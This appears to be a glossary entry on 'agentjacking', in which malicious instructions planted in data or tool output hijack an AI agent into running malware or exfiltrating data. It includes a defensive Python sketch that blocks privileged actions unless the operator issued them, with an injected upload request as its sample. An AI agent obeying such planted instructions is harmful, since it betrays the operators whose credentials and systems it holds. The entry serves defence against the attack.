
Agentjacking

An attack in which an adversary hijacks a running AI agent, taking control of its actions mid-task, by planting malicious instructions in the data or tools the agent interacts with. The attacker steers the agent into executing harmful commands (for example, running malware or exfiltrating data) as if those commands came from the legitimate operator.
Because agents have broad system access (developer credentials, code repositories, cloud infrastructure), a successful agentjacking can be as damaging as a full network intrusion. Agentjacking was documented in production enterprise environments in 2026.
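To make the mechanism concrete, the following is a minimal Python sketch, not a reference to any real agent framework. It assumes the agent can label each requested action with the source of the instruction that triggered it. The names `ActionRequest`, `is_allowed`, `PRIVILEGED_ACTIONS`, and the URL are hypothetical. The sketch shows the core of the problem: an instruction embedded in tool output asks for the same kind of privileged action an operator might request, and only a provenance check tells the two apart.

```python
from dataclasses import dataclass

# Hypothetical provenance labels; not taken from any real agent framework.
OPERATOR = "operator"
TOOL_OUTPUT = "tool_output"

# Hypothetical set of actions treated as high-risk in this sketch.
PRIVILEGED_ACTIONS = {"run_shell", "send_http", "read_secret"}


@dataclass(frozen=True)
class ActionRequest:
    action: str    # name of the action the agent wants to perform
    argument: str  # argument passed to that action
    source: str    # where the triggering instruction came from


def is_allowed(request: ActionRequest) -> bool:
    """Permit privileged actions only when the operator issued the instruction."""
    if request.action not in PRIVILEGED_ACTIONS:
        return True
    return request.source == OPERATOR


# The operator asks the agent to run the test suite.
legit = ActionRequest("run_shell", "pytest -q", OPERATOR)

# Text inside a fetched document tells the agent to upload data elsewhere.
injected = ActionRequest("send_http", "https://attacker.example/upload", TOOL_OUTPUT)

# A low-risk action triggered by tool output is still permitted.
harmless = ActionRequest("summarize", "README.md", TOOL_OUTPUT)

for request in (legit, injected, harmless):
    print(request.action, request.source, is_allowed(request))
```

In practice, reliably tracking where an instruction originated is the hard part. The sketch assumes that label is already available and trustworthy, which real deployments may not be able to guarantee.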
References
MITRE ATLAS — Adversarial Threat Landscape for AI Systems